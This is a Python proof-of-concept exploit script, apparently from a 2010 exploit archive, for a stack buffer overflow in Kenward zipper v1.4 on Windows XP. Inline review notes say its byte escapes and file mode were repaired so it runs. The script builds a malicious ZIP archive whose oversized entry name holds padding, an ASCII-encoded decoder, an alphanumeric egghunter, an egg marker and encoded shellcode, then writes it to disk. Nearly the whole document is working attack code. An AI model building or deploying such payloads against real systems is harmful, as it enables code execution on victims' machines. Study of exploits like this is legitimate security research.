# Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
# Published : 2010-03-22
# Author : mr_me
#!/usr/bin/python
# #################################################################################################
# Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
# Date : 23/3/2010
# Bug found by : corelanc0d3r (http://www.corelan.be:8800/)
# Author : mr_me (http://net-ninja.net/)
# Software Link : http://www.trans4mind.com/personal_development/zipper/
# Version : 1.4
# OS : Windows
# Tested on : XP SP3 En
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #################################################################################################
# http://www.abysssec.com/blog/2010/03/ken-ward-zipper-stack-bof-0day-a-not-so-typical-seh-exploit/
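# Review notes on this listing:
#  * Every "\x.." escape in the corpus copy had its backslash stripped ("x50x4B"),
#    so the script as shown wrote ASCII text instead of the intended bytes; the
#    escapes are restored below as bytes literals so the offsets add up again.
#  * The `name` literal was split over two lines with no continuation, so only
#    its first half was ever used; it is one literal again.
#  * The archive was opened in text mode ('w'); on the Windows host this PoC
#    targets that newline-translates the payload. It is now written in 'wb'.
#  * Building is separated from writing so the payload can be inspected/tested
#    without touching the filesystem; `python thisfile.py` behaves as before.
# This remains a crash/PoC generator for a specific Windows binary -- run it only
# against that target in an isolated lab.


def print_banner():
    """Print the team banner and exploit title (cosmetic; ASCII art is as found)."""
    print("|------------------------------------------------------------------|")
    print("| __ __ |")
    print("| _________ ________ / /___ _____ / /____ ____ _____ ___ |")
    print("| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |")
    print("| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |")
    print("| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |")
    print("| |")
    print("| http://www.corelan.be:8800 |")
    print("| security@corelan.be |")
    print("| |")
    print("|-------------------------------------------------[ EIP Hunters ]--|")
    print("~~> Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit <~~")


# --- ZIP container scaffolding ---------------------------------------------
# All three headers are kept byte-for-byte from the original PoC. The 0x0fe4
# (4068) length fields equal len(build_attack_string()); the end-of-central-
# directory values 0x1012 (4114 = 46 + 4068) and 0x1002 (4098 = 30 + 4068) are
# consistent with a 30-byte local header and a 46-byte central header.
# NOTE(review): ldf_header has 11 zero bytes between \xCE\x34 and \xe4\x0f where
# cdf_header has 12, so in the local header the 0x0fe4 value lands one byte
# earlier than a by-the-spec filename-length field would. Left verbatim (the
# target may not care), but confirm against the ZIP spec before reusing it.

# local file header (30 bytes)
ldf_header = (b"\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
              b"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")

# central directory header (46 bytes)
cdf_header = (b"\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
              b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00"
              b"\x00\x00\x00\x00\x00")

# end of central directory record (22 bytes)
eofcdf_header = (b"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
                 b"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")

# --- payload pieces ---------------------------------------------------------

# custom decoder: 52 bytes, all in the printable ASCII range. The 0x25 (and eax)
# / 0x2d (sub eax) / 0x50 (push eax) pattern is the usual ASCII sub-encoding
# idiom; what it decodes to is not derivable from this listing alone.
decoder = (b"\x25\x4A\x4D\x4E\x55"
           b"\x25\x35\x32\x31\x2A\x2d\x55\x55"
           b"\x55\x5f\x2d\x56\x55\x56\x5f\x2d"
           b"\x55\x55\x55\x5e\x50\x25\x4A\x4D"
           b"\x4E\x55\x25\x35\x32\x31\x2A\x2d"
           b"\x2b\x5b\x39\x54\x2d\x2a\x5b\x39"
           b"\x54\x2d\x2a\x5f\x39\x55\x50")

# alphanumeric egghunter (pre-encoded; the "J" run at the front is typical
# alignment/decoder-stub padding for that encoding)
egghunter = (b"JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
             b"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA")

# final-stage shellcode. The variable name says calc; the leading \xd9\xf7\xd9\x74
# \x24\xf4 is the familiar fnstenv GetPC stub of an alphanumeric encoder, but
# the decoded payload was not verified here.
calc = (b"\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
        b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
        b"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
        b"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
        b"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
        b"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
        b"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
        b"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
        b"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
        b"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
        b"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
        b"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
        b"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
        b"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
        b"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
        b"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
        b"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
        b"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
        b"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
        b"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
        b"\x50\x41\x41")

# "chasing the stack": 67 x popad (0x61), then pop eax; pop eax (0x58 0x58)
# and a short backwards jump (0x73 = jnb rel8, 0xf9 = -7)
align = b"\x61" * 67 + b"\x58\x58\x73\xf9"

# leading filename text (26 bytes, plain ASCII -- same bytes the original
# spelled out as \x6D\x72... over two lines)
name = b"mr_mes_password_collection"


def build_attack_string():
    """Return the 4068-byte (0x0fe4) archive entry name that overflows the target.

    Layout, by absolute offset into the returned bytes:
      0      name, then 0x43 filler up to the egghunter
      ...    egghunter, 0x43 filler to 878
      878    push esp / pop edx (0x54 0x5a) followed by `decoder`
      932    0x73 0xf9 short jump, 0x44 filler, another 0x73 0xf9
      951    `align`, then 0x42 filler to 1022
      1022   0x73 0xf9 0x41 0x41, then 0x6d 0x26 0x44 0x00 (the 0x00 ends
             the usable string for a C-string consumer)
      1030   "W00TW00T" -- presumably the egg the hunter scans for, then `calc`
      ...    0x42 filler to 4064, then ".txt"
    The padding arithmetic only holds because every literal is bytes; see the
    review notes at the top.
    """
    exploit = name
    exploit += b"\x43" * 266
    exploit += egghunter
    exploit += b"\x43" * (878 - len(exploit))
    exploit += b"\x54\x5a"
    exploit += decoder
    exploit += b"\x73\xf9"
    exploit += b"\x44" * (67 - len(decoder))
    exploit += b"\x73\xf9"
    exploit += align
    exploit += b"\x42" * (1022 - len(exploit))
    exploit += b"\x73\xf9\x41\x41"
    exploit += b"\x6d\x26\x44\x00"
    exploit += b"\x57\x30\x30\x54"
    exploit += b"\x57\x30\x30\x54"
    # when the ninja strikes the samurai, the emperor wore no clothes
    exploit += calc
    exploit += b"\x42" * (4064 - len(exploit))
    exploit += b"\x2e\x74\x78\x74"
    return exploit


def build_zip():
    """Return the complete archive image (8234 bytes).

    The attack string is used as the file name in both the local file header
    and the central directory entry, matching the 0x0fe4 length fields.
    """
    exploit = build_attack_string()
    return ldf_header + exploit + cdf_header + exploit + eofcdf_header


def main():
    """Print the banner and write cst-kenzip.zip into the current directory."""
    print_banner()
    print("[+] Building attack string...")
    payload = build_zip()
    print("[+] Writing payload to cst-kenzip.zip")
    # binary mode: the payload must reach disk byte-for-byte (no newline
    # translation on Windows, no text encoding on Python 3)
    with open("cst-kenzip.zip", "wb") as mefile:
        mefile.write(payload)
    print("[+] Exploit file created!!")


if __name__ == "__main__":
    main()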